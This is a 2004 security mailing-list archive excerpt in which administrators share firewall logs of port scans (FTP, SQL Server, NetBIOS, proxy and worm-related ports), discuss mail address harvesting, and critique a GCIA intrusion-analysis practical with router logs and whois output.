Jun 30 10:29:47 81.84.204.39:3358 -> xxx.yyy.1.1:455 SYN ******S*
Jun 30 10:29:47 81.84.204.39:3359 -> xxx.yyy.1.2:455 SYN ******S*
Jun 30 10:29:46 81.84.204.39:3361 -> xxx.yyy.1.4:455 SYN ******S*
Jun 30 10:29:47 81.84.204.39:3360 -> xxx.yyy.1.3:455 SYN ******S*
Jun 30 10:29:46 81.84.204.39:3362 -> xxx.yyy.1.5:455 SYN ******S*
Jun 30 10:29:46 81.84.204.39:3363 -> xxx.yyy.1.6:455 SYN ******S*
Jun 30 10:29:46 81.84.204.39:3364 -> xxx.yyy.1.7:455 SYN ******S*
[...]
Jun 30 12:30:18 81.84.204.39:3494 -> xxx.yyy.254.246:455 SYN ******S*
Jun 30 12:30:18 81.84.204.39:3495 -> xxx.yyy.254.247:455 SYN ******S*
Jun 30 12:30:18 81.84.204.39:3496 -> xxx.yyy.254.248:455 SYN ******S*
Jun 30 12:30:20 81.84.204.39:3598 -> xxx.yyy.254.250:455 SYN ******S*
Jun 30 12:30:20 81.84.204.39:3599 -> xxx.yyy.254.251:455 SYN ******S*
Jun 30 12:30:20 81.84.204.39:3600 -> xxx.yyy.254.252:455 SYN ******S*
Jun 30 12:30:20 81.84.204.39:3602 -> xxx.yyy.254.254:455 SYN ******S*
Jun 30 12:30:20 81.84.204.39:3601 -> xxx.yyy.254.253:455 SYN ******S*
Jun 30 12:30:20 81.84.204.39:3603 -> xxx.yyy.254.255:455 SYN ******S*
44143

Jun 30 09:53:49 212.106.69.98:2838 -> xxx.yyy.1.1:21 SYN ******S*
Jun 30 09:53:49 212.106.69.98:2839 -> xxx.yyy.1.2:21 SYN ******S*
Jun 30 09:53:49 212.106.69.98:2840 -> xxx.yyy.1.3:21 SYN ******S*
Jun 30 09:53:49 212.106.69.98:2841 -> xxx.yyy.1.4:21 SYN ******S*
Jun 30 09:53:49 212.106.69.98:2842 -> xxx.yyy.1.5:21 SYN ******S*
Jun 30 09:53:49 212.106.69.98:2843 -> xxx.yyy.1.6:21 SYN ******S*
Jun 30 09:53:49 212.106.69.98:2844 -> xxx.yyy.1.7:21 SYN ******S*
Jun 30 09:53:49 212.106.69.98:2845 -> xxx.yyy.1.8:21 SYN ******S*
[...]
Jun 30 10:06:07 212.106.69.98:2062 -> xxx.yyy.255.246:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2063 -> xxx.yyy.255.247:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2064 -> xxx.yyy.255.248:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2065 -> xxx.yyy.255.249:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2066 -> xxx.yyy.255.250:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2067 -> xxx.yyy.255.251:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2068 -> xxx.yyy.255.252:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2069 -> xxx.yyy.255.253:21 SYN ******S*
Jun 30 10:06:07 212.106.69.98:2070 -> xxx.yyy.255.254:21 SYN ******S*
43583

Jun 30 13:11:18 218.103.94.3:3195 -> xxx.yyy.1.1:1433 SYN ******S*
Jun 30 13:11:18 218.103.94.3:3196 -> xxx.yyy.1.2:1433 SYN ******S*
Jun 30 13:11:18 218.103.94.3:3197 -> xxx.yyy.1.3:1433 SYN ******S*
Jun 30 13:11:18 218.103.94.3:3198 -> xxx.yyy.1.4:1433 SYN ******S*
Jun 30 13:11:18 218.103.94.3:3199 -> xxx.yyy.1.5:1433 SYN ******S*
Jun 30 13:11:18 218.103.94.3:3200 -> xxx.yyy.1.6:1433 SYN ******S*
Jun 30 13:11:18 218.103.94.3:3201 -> xxx.yyy.1.7:1433 SYN ******S*
Jun 30 13:11:18 218.103.94.3:3202 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jun 30 13:28:14 218.103.94.3:4160 -> xxx.yyy.255.247:1433 SYN ******S*
Jun 30 13:28:14 218.103.94.3:4161 -> xxx.yyy.255.248:1433 SYN ******S*
Jun 30 13:28:14 218.103.94.3:4162 -> xxx.yyy.255.249:1433 SYN ******S*
Jun 30 13:28:14 218.103.94.3:4163 -> xxx.yyy.255.250:1433 SYN ******S*
Jun 30 13:28:14 218.103.94.3:4164 -> xxx.yyy.255.251:1433 SYN ******S*
Jun 30 13:28:14 218.103.94.3:4165 -> xxx.yyy.255.252:1433 SYN ******S*
Jun 30 13:28:14 218.103.94.3:4167 -> xxx.yyy.255.254:1433 SYN ******S*
Jun 30 13:28:14 218.103.94.3:4166 -> xxx.yyy.255.253:1433 SYN ******S*
41406

Jun 30 14:42:06 212.76.39.225:4229 -> xxx.yyy.106.130:139 SYN ******S*
Jun 30 14:42:06 212.76.39.225:4230 -> xxx.yyy.212.3:139 SYN ******S*
Jun 30 14:42:03 212.76.39.225:4236 -> xxx.yyy.229.140:139 SYN ******S*
Jun 30 14:42:03 212.76.39.225:4234 -> xxx.yyy.1.1:139 SYN ******S*
Jun 30 14:42:03 212.76.39.225:4237 -> xxx.yyy.80.15:139 SYN ******S*
Jun 30 14:42:03 212.76.39.225:4238 -> xxx.yyy.185.144:139 SYN ******S*
Jun 30 14:42:03 212.76.39.225:4240 -> xxx.yyy.141.148:139 SYN ******S*
Jun 30 14:42:06 212.76.39.225:4241 -> xxx.yyy.247.21:139 SYN ******S*
[...]
Jun 30 22:35:57 212.76.39.225:2357 -> xxx.yyy.166.51:139 SYN ******S*
Jun 30 22:35:57 212.76.39.225:2396 -> xxx.yyy.164.77:139 SYN ******S*
Jun 30 22:36:00 212.76.39.225:2396 -> xxx.yyy.164.77:139 SYN ******S*
Jun 30 22:36:00 212.76.39.225:2406 -> xxx.yyy.252.138:139 SYN ******S*
Jun 30 22:36:01 212.76.39.225:2442 -> xxx.yyy.254.112:139 SYN ******S*
Jun 30 22:36:04 212.76.39.225:2442 -> xxx.yyy.254.112:139 SYN ******S*
Jun 30 22:36:07 212.76.39.225:2539 -> xxx.yyy.168.25:139 SYN ******S*
Jun 30 22:36:10 212.76.39.225:2539 -> xxx.yyy.168.25:139 SYN ******S*
37467

Jun 30 10:25:52 211.72.154.170:40168 -> xxx.yyy.1.5:6112 SYN ******S*
Jun 30 10:25:52 211.72.154.170:40169 -> xxx.yyy.1.6:6112 SYN ******S*
Jun 30 10:25:52 211.72.154.170:40170 -> xxx.yyy.1.7:6112 SYN ******S*
Jun 30 10:25:52 211.72.154.170:40171 -> xxx.yyy.1.8:6112 SYN ******S*
Jun 30 10:25:52 211.72.154.170:40172 -> xxx.yyy.1.9:6112 SYN ******S*
Jun 30 10:25:52 211.72.154.170:40173 -> xxx.yyy.1.10:6112 SYN ******S*
Jun 30 10:25:52 211.72.154.170:40174 -> xxx.yyy.1.11:6112 SYN ******S*
Jun 30 10:25:52 211.72.154.170:40175 -> xxx.yyy.1.12:6112 SYN ******S*
[...]
Jun 30 10:29:07 211.72.154.170:48547 -> xxx.yyy.255.75:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48548 -> xxx.y  yy.255.76:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48549 -> xxx.yyy.255.77:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48550 -> xxx.yyy.255.78:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48551 -> xxx.yyy.255.79:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48552 -> xxx.yyy.255.80:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48553 -> xxx.yyy.255.81:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48554 -> xxx.yyy.255.82:6112 SYN ******S*
Jun 30 10:29:07 211.72.154.170:48555 -> xxx.yyy.255.83:6112 SYN ******S*
17780

Jun 30 23:45:07 218.251.42.78:2378 -> xxx.yyy.133.14:5554 SYN ******S*
Jun 30 23:45:08 218.251.42.78:2876 -> xxx.yyy.133.14:1023 SYN ******S*
Jun 30 23:45:10 218.251.42.78:4020 -> xxx.yyy.133.14:9898 SYN ******S*
Jun 30 23:45:07 218.251.42.78:2381 -> xxx.yyy.133.15:5554 SYN ******S*
Jun 30 23:45:08 218.251.42.78:2879 -> xxx.yyy.133.15:1023 SYN ******S*
Jun 30 23:45:10 218.251.42.78:4026 -> xxx.yyy.133.15:9898 SYN ******S*
Jun 30 23:45:07 218.251.42.78:2389 -> xxx.yyy.133.16:5554 SYN ******S*
Jun 30 23:45:08 218.251.42.78:2887 -> xxx.yyy.133.16:1023 SYN ******S*
[...]
Jun 30 23:45:57 218.251.42.78:3603 -> xxx.yyy.153.104:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3604 -> xxx.yyy.153.105:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3605 -> xxx.yyy.153.106:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3606 -> xxx.yyy.153.102:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3612 -> xxx.yyy.153.103:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3618 -> xxx.yyy.153.107:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3626 -> xxx.yyy.153.108:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3628 -> xxx.yyy.153.109:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3631 -> xxx.yyy.153.110:9898 SYN ******S* 15356 Jun 30 00:56:48 221.192.0.29:4396 -> xxx.yyy.195.88:5554 SYN ******S* Jun 30 00:56:49 221.192.0.29:1717 -> xxx.yyy.195.88:1023 SYN ******S* Jun 30 00:56:51 221.192.0.29:4469 -> xxx.yyy.195.88:9898 SYN ******S* Jun 30 00:56:48 221.192.0.29:4398 -> xxx.yyy.195.89:5554 SYN ******S* Jun 30 00:56:49 221.192.0.29:1737 -> xxx.yyy.195.89:1023 SYN ******S* Jun 30 00:56:51 221.192.0.29:4476 -> xxx.yyy.195.89:9898 SYN ******S* Jun 30 00:56:48 221.192.0.29:4407 -> xxx.yyy.195.91:5554 SYN ******S* Jun 30 00:56:49 221.192.0.29:1739 -> xxx.yyy.195.91:1023 SYN ******S* [...] 
Jun 30 00:58:00 221.192.0.29:4279 -> xxx.yyy.214.91:9898 SYN ******S* Jun 30 00:58:00 221.192.0.29:4268 -> xxx.yyy.214.84:9898 SYN ******S* Jun 30 00:58:00 221.192.0.29:4385 -> xxx.yyy.214.98:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:4672 -> xxx.yyy.215.135:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:4759 -> xxx.yyy.215.144:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:1801 -> xxx.yyy.215.152:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:1799 -> xxx.yyy.215.151:9898 SYN ******S* Jun 30 00:58:02 221.192.0.29:2429 -> xxx.yyy.215.209:9898 SYN ******S* 12262 Jun 30 00:56:16 220.202.18.99:2382 -> xxx.yyy.133.14:5554 SYN ******S* Jun 30 00:56:17 220.202.18.99:2651 -> xxx.yyy.133.14:1023 SYN ******S* Jun 30 00:56:19 220.202.18.99:3149 -> xxx.yyy.133.14:9898 SYN ******S* Jun 30 00:56:16 220.202.18.99:2383 -> xxx.yyy.133.15:5554 SYN ******S* Jun 30 00:56:17 220.202.18.99:2671 -> xxx.yyy.133.15:1023 SYN ******S* Jun 30 00:56:19 220.202.18.99:3185 -> xxx.yyy.133.15:9898 SYN ******S* Jun 30 00:56:16 220.202.18.99:2384 -> xxx.yyy.133.16:5554 SYN ******S* Jun 30 00:56:17 220.202.18.99:2672 -> xxx.yyy.133.16:1023 SYN ******S* [...] 
Jun 30 00:57:39 220.202.18.99:3661 -> xxx.yyy.153.74:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3662 -> xxx.yyy.153.75:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3663 -> xxx.yyy.153.76:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3664 -> xxx.yyy.153.77:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3665 -> xxx.yyy.153.78:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3991 -> xxx.yyy.153.133:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3992 -> xxx.yyy.153.134:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3993 -> xxx.yyy.153.135:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3994 -> xxx.yyy.153.136:9898 SYN ******S* 12230 Jun 30 00:57:07 61.48.51.171:4593 -> xxx.yyy.174.223:5554 SYN ******S* Jun 30 00:57:08 61.48.51.171:1274 -> xxx.yyy.174.223:1023 SYN ******S* Jun 30 00:57:10 61.48.51.171:2376 -> xxx.yyy.174.223:9898 SYN ******S* Jun 30 00:57:07 61.48.51.171:4592 -> xxx.yyy.174.222:5554 SYN ******S* Jun 30 00:57:08 61.48.51.171:1273 -> xxx.yyy.174.222:1023 SYN ******S* Jun 30 00:57:10 61.48.51.171:2375 -> xxx.yyy.174.222:9898 SYN ******S* Jun 30 00:57:07 61.48.51.171:4594 -> xxx.yyy.174.224:5554 SYN ******S* Jun 30 00:57:08 61.48.51.171:1275 -> xxx.yyy.174.224:1023 SYN ******S* [...] 
Jun 30 00:58:04 61.48.51.171:2652 -> xxx.yyy.195.39:9898 SYN ******S* Jun 30 00:58:04 61.48.51.171:2654 -> xxx.yyy.195.27:9898 SYN ******S* Jun 30 00:58:04 61.48.51.171:2653 -> xxx.yyy.195.24:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2664 -> xxx.yyy.195.42:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2687 -> xxx.yyy.195.53:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2688 -> xxx.yyy.195.66:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2689 -> xxx.yyy.195.74:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2693 -> xxx.yyy.195.73:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2697 -> xxx.yyy.195.72:9898 SYN ******S* 10955 Jun 30 19:35:39 218.76.57.194:4624 -> xxx.yyy.234.54:3128 SYN ******S* Jun 30 19:35:38 218.76.57.194:4636 -> xxx.yyy.233.8:3128 SYN ******S* Jun 30 19:35:35 218.76.57.194:4642 -> xxx.yyy.134.204:3128 SYN ******S* Jun 30 19:35:38 218.76.57.194:4607 -> xxx.yyy.141.49:3128 SYN ******S* Jun 30 19:35:36 218.76.57.194:4599 -> xxx.yyy.234.8:3128 SYN ******S* Jun 30 19:35:43 218.76.57.194:4669 -> xxx.yyy.15.246:3128 SYN ******S* Jun 30 19:35:44 218.76.57.194:4636 -> xxx.yyy.233.8:3128 SYN ******S* Jun 30 19:35:44 218.76.57.194:4659 -> xxx.yyy.86.95:3128 SYN ******S* [...] 
Jun 30 23:59:50 218.76.57.194:4436 -> xxx.yyy.184.96:3128 SYN ******S* Jun 30 23:59:51 218.76.57.194:4417 -> xxx.yyy.105.99:3128 SYN ******S* Jun 30 23:59:54 218.76.57.194:4440 -> xxx.yyy.221.113:3128 SYN ******S* Jun 30 23:59:52 218.76.57.194:4442 -> xxx.yyy.175.100:3128 SYN ******S* Jun 30 23:59:52 218.76.57.194:4434 -> xxx.yyy.67.128:3128 SYN ******S* Jun 30 23:59:53 218.76.57.194:4435 -> xxx.yyy.163.44:3128 SYN ******S* Jun 30 23:59:53 218.76.57.194:4436 -> xxx.yyy.184.96:3128 SYN ******S* Jun 30 23:59:58 218.76.57.194:4506 -> xxx.yyy.174.207:3128 SYN ******S* Jun 30 23:59:58 218.76.57.194:4433 -> xxx.yyy.67.128:3128 SYN ******S* 10035 Jun 30 00:56:46 61.55.13.12:2655 -> xxx.yyy.174.225:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2649 -> xxx.yyy.174.222:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2653 -> xxx.yyy.174.224:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2643 -> xxx.yyy.174.223:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2666 -> xxx.yyy.174.231:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2656 -> xxx.yyy.174.226:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2660 -> xxx.yyy.174.227:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2665 -> xxx.yyy.174.230:1023 SYN ******S* [...] 
Jun 30 00:57:39 61.55.13.12:1808 -> xxx.yyy.176.153:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1549 -> xxx.yyy.176.144:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1824 -> xxx.yyy.176.146:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1821 -> xxx.yyy.176.154:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1836 -> xxx.yyy.176.158:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1862 -> xxx.yyy.176.147:1023 SYN ******S* Jun 30 00:57:41 61.55.13.12:1836 -> xxx.yyy.176.159:9898 SYN ******S* Jun 30 00:57:41 61.55.13.12:4989 -> xxx.yyy.176.126:9898 SYN ******S* Jun 30 00:57:41 61.55.13.12:4969 -> xxx.yyy.176.110:9898 SYN ******S* 8821 Jun 30 00:56:20 219.157.161.122:4970 -> xxx.yyy.153.147:5554 SYN ******S* Jun 30 00:56:21 219.157.161.122:1382 -> xxx.yyy.153.147:1023 SYN ******S* Jun 30 00:56:23 219.157.161.122:1931 -> xxx.yyy.153.147:9898 SYN ******S* Jun 30 00:56:20 219.157.161.122:4972 -> xxx.yyy.153.146:5554 SYN ******S* Jun 30 00:56:21 219.157.161.122:1383 -> xxx.yyy.153.146:1023 SYN ******S* Jun 30 00:56:23 219.157.161.122:1932 -> xxx.yyy.153.146:9898 SYN ******S* Jun 30 00:56:20 219.157.161.122:4979 -> xxx.yyy.153.144:5554 SYN ******S* Jun 30 00:56:21 219.157.161.122:1393 -> xxx.yyy.153.144:1023 SYN ******S* [...] 
Jun 30 00:58:22 219.157.161.122:1353 -> xxx.yyy.173.250:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1364 -> xxx.yyy.173.252:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1347 -> xxx.yyy.173.247:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1362 -> xxx.yyy.173.251:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1352 -> xxx.yyy.173.249:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1365 -> xxx.yyy.173.253:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1367 -> xxx.yyy.173.255:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1370 -> xxx.yyy.174.1:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1366 -> xxx.yyy.173.254:9898 SYN ******S* 8656 Jun 30 01:02:46 218.0.205.163:1430 -> xxx.yyy.153.138:5554 SYN ******S* Jun 30 01:02:48 218.0.205.163:1886 -> xxx.yyy.153.138:1023 SYN ******S* Jun 30 01:02:46 218.0.205.163:1442 -> xxx.yyy.153.140:5554 SYN ******S* Jun 30 01:02:46 218.0.205.163:1444 -> xxx.yyy.153.141:5554 SYN ******S* Jun 30 01:02:48 218.0.205.163:1908 -> xxx.yyy.153.141:1023 SYN ******S* Jun 30 01:02:46 218.0.205.163:1449 -> xxx.yyy.153.143:5554 SYN ******S* Jun 30 01:02:48 218.0.205.163:1914 -> xxx.yyy.153.143:1023 SYN ******S* Jun 30 01:02:46 218.0.205.163:1461 -> xxx.yyy.153.145:5554 SYN ******S* [...] 
Jun 30 01:03:44 218.0.205.163:1764 -> xxx.yyy.155.181:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1771 -> xxx.yyy.155.176:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1772 -> xxx.yyy.155.182:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1784 -> xxx.yyy.155.169:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1793 -> xxx.yyy.155.188:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1798 -> xxx.yyy.155.175:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1824 -> xxx.yyy.155.191:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1840 -> xxx.yyy.155.207:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1879 -> xxx.yyy.155.198:9898 SYN ******S* 7493 Jun 30 00:57:01 61.177.11.30:3542 -> xxx.yyy.71.160:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3552 -> xxx.yyy.71.162:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3561 -> xxx.yyy.71.164:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3562 -> xxx.yyy.71.165:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3596 -> xxx.yyy.71.167:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3598 -> xxx.yyy.71.169:5554 SYN ******S* Jun 30 00:57:03 61.177.11.30:4672 -> xxx.yyy.71.169:1023 SYN ******S* Jun 30 00:57:01 61.177.11.30:3599 -> xxx.yyy.71.170:5554 SYN ******S* [...] 
Jun 30 00:58:39 61.177.11.30:4274 -> xxx.yyy.92.3:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4292 -> xxx.yyy.92.23:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4356 -> xxx.yyy.89.233:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4357 -> xxx.yyy.89.230:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4358 -> xxx.yyy.89.236:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4359 -> xxx.yyy.89.235:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4365 -> xxx.yyy.90.148:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4397 -> xxx.yyy.90.174:9898 SYN ******S*
Jun 30 00:58:39 61.177.11.30:4599 -> xxx.yyy.89.234:9898 SYN ******S*
6549

-- 
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From mducharme at cybergeneration.com Fri Jul 2 13:58:44 2004
From: mducharme at cybergeneration.com (Maxime Ducharme)
Date: Fri, 02 Jul 2004 09:58:44 -0400
Subject: [Intrusions] Increased mail address harvesting
References: <200406291140.53260.misch@multinet.de>
Message-ID: <016201c4603c$b0aeda90$a900a8c0@cybergeneration.com>

Hi Michael,

we are experiencing the same issue here, about 4-5 domains a day get harvested, our retry queue is always filling up with bogus User unknown bounces.

I'd be interested if you know any good scripts.

Thanks in advance

Maxime Ducharme
Programmer / Network Security Specialist

----- Original Message -----
From: "Michael Schwartzkopff"
To:
Sent: Tuesday, June 29, 2004 5:40 AM
Subject: [Intrusions] Increased mail address harvesting

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi,
>
> On my mail server I see an increased harvesting traffic for mail addresses. It seems that compromised dial-up clients scan for semi-random generated mail addresses.
>
> Is there any good script which reads postfix output ("User unknown") and feeds the firewall accordingly? Thanks.
>
> - --
> Dr. Michael Schwartzkopff
> MultiNET Services GmbH
> Bretonischer Ring 7
> 85630 Grasbrunn
>
> Tel: (+49 89) 456 911 - 0
> Fax: (+49 89) 456 911 - 21
> mob: (+49 174) 343 28 75
>
> PGP Fingerprint: F919 3919 FF12 ED5A 2801 DEA6 AA77 57A4 EDD8 979B
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
>
> iD8DBQFA4TkjqndXpO3Yl5sRAnPWAJ9WQPrP8M/mtpsAZ7/R4zOtnqnuYgCfVWet
> oqOkexoG4YsXPMRq8X+r9JE=
> =E7Sc
> -----END PGP SIGNATURE-----
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions

From Donald.Smith at qwest.com Fri Jul 2 14:55:16 2004
From: Donald.Smith at qwest.com (Smith, Donald)
Date: Fri, 2 Jul 2004 08:55:16 -0600
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.5 Practical Detect JeremyScott
Message-ID: <9921AB57EA49D242A076864C5F473D3C6500D5@itdene2km08.AD.QINTRA.COM>

Donald.Smith at qwest.com GCIA
I reserve the right to be wrong but don't exercise it too often.

> -----Original Message-----
> From: intrusions-bounces at lists.sans.org [mailto:intrusions-bounces at lists.sans.org] On Behalf Of jscott at rolenstarsupply.com
> Sent: Thursday, July 01, 2004 4:55 PM
> To: intrusions at incidents.org
> Subject: [Intrusions] LOGS: GIAC GCIA Version 3.5 Practical Detect JeremyScott
>

Not very much detail. It makes it harder later to draw conclusions.
> Network Detect 2: Proxy scan
>
> Jun 20 00:00:00 tcp 216.232.9.229(1422) xxx.xxx.xxx.231(3127), denied
> Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
> Jun 20 00:00:08 tcp 220.99.138.166(4738) xxx.xxx.xxx.37(3127), denied
> Jun 20 00:00:08 icmp 217.88.124.253 xxx.xxx.xxx.221 denied
> Jun 20 00:00:14 tcp 220.99.138.166(3208) xxx.xxx.xxx.35(3128), denied
> Jun 20 00:00:16 tcp 216.232.9.229(1690) xxx.xxx.xxx.231(1080), denied
>
> 1. Source of Trace:
>
> This was taken from the external router log produced on my company network. Our intrusion detection is within the external router; therefore, no other logs are available to correlate the data. The internal IP addresses have been obfuscated for security reasons.
>
> 2. Detect was generated by:
>
> Self observation of the external router logs pulled on a daily basis. Looking at the logs for signs of malicious behavior by hand can be tedious but there can also be a wealth of knowledge in what is happening just outside your border.
> Here is a compiled example of the scan:
>
> Access Attempts logged By MY_ROUTER
>
> Mon Day Time     Type  Source Address (Port)    Destination Address (Port)
> --- --
> Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
> Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
> Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
> Jun 20 00:00:22 tcp 220.99.138.166(3486) xxx.xxx.xxx.35(1080), denied
> Jun 20 00:00:40 tcp 220.99.138.166(4068) xxx.xxx.xxx.36(3128), denied
> Jun 20 00:01:01 tcp 220.99.138.166(4738) xxx.xxx.xxx.37(3127), denied
> Jun 20 00:01:28 tcp 220.99.138.166(3825) xxx.xxx.xxx.40(3128), denied
> Jun 20 00:01:36 tcp 220.99.138.166(4105) xxx.xxx.xxx.40(1080), denied
> Jun 20 00:01:44 tcp 220.99.138.166(4382) xxx.xxx.xxx.41(3127), denied
> Jun 20 00:01:52 tcp 220.99.138.166(4869) xxx.xxx.xxx.41(3128), denied
> Jun 20 00:01:58 tcp 220.99.138.166(3825) xxx.xxx.xxx.40(3128), denied
> Jun 20 00:02:04 tcp 220.99.138.166(4105) xxx.xxx.xxx.40(1080), denied
> Jun 20 00:02:24 tcp 220.99.138.166(3209) xxx.xxx.xxx.41(1080), denied
> Jun 20 00:02:40 tcp 220.99.138.166(3507) xxx.xxx.xxx.42(3127), denied
> Jun 20 00:02:53 tcp 220.99.138.166(4053) xxx.xxx.xxx.42(1080), denied
> Jun 20 00:03:02 tcp 220.99.138.166(4326) xxx.xxx.xxx.43(3127), denied

Look at the source and dst ports; notice anything? There appear to be some "near" matches (1st and fourth digit matching).

> Jun 20 00:03:04 tcp 220.99.138.166(3698) xxx.xxx.xxx.44(3128), denied
> Jun 20 00:03:11 tcp 220.99.138.166(4727) xxx.xxx.xxx.43(3128), denied
> Jun 20 00:03:16 tcp 220.99.138.166(3427) xxx.xxx.xxx.44(3127), denied
> Jun 20 00:03:28 tcp 220.99.138.166(3698) xxx.xxx.xxx.44(3128), denied
> Jun 20 00:03:33 tcp 220.99.138.166(3970) xxx.xxx.xxx.44(1080), denied
> Jun 20 00:03:52 tcp 220.99.138.166(4247) xxx.xxx.xxx.45(3127), denied
> Jun 20 00:04:00 tcp 220.99.138.166(4629) xxx.xxx.xxx.45(3128), denied
> Jun 20 00:04:17 tcp 220.99.138.166(3345) xxx.xxx.xxx.46(3127), denied
> Jun 20 00:04:30 tcp 220.99.138.166(3902) xxx.xxx.xxx.46(1080), denied
> Jun 20 00:04:37 tcp 220.99.138.166(4176) xxx.xxx.xxx.47(3127), denied
> Jun 20 00:04:48 tcp 220.99.138.166(4969) xxx.xxx.xxx.47(1080), denied
> Jun 20 00:05:04 tcp 220.99.138.166(3554) xxx.xxx.xxx.48(3128), denied
>
> 3. Probability the source address was spoofed:
>
> Since there were no other logs to correlate the data to, I can't tell if the packets have any signs of crafting. However, because of the ports that are being scanned the source address is probably real.

Headers would be helpful!

> Source Address - The source address is 220.99.138.166. If you do a whois on the IP address, you will be returned with the following information from APNIC.

Very difficult to read; you might want to reformat. It was all run together before I responded.

> % [whois.apnic.net node-1]
> % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
>
> inetnum:      220.96.0.0 - 220.99.255.255
> netname:      OCN-JPNIC-JP
> descr:        OCN Provided By NTT-Communications which is ISP
> descr:        in Chiyoda-ku, Tokyo, Japan
> country:      JP
> admin-c:      JNIC1-AP
> tech-c:       JNIC1-AP
> remarks:      ************************************************
> remarks:      Allocated to JPNIC member. Authoritative
> remarks:      information regarding assignments and allocation
> remarks:      made from within this block can also be queried
> remarks:      at whois.nic.ad.jp. To obtain an English output
> remarks:      query whois -h whois.nic.ad.jp x.x.x.x/e
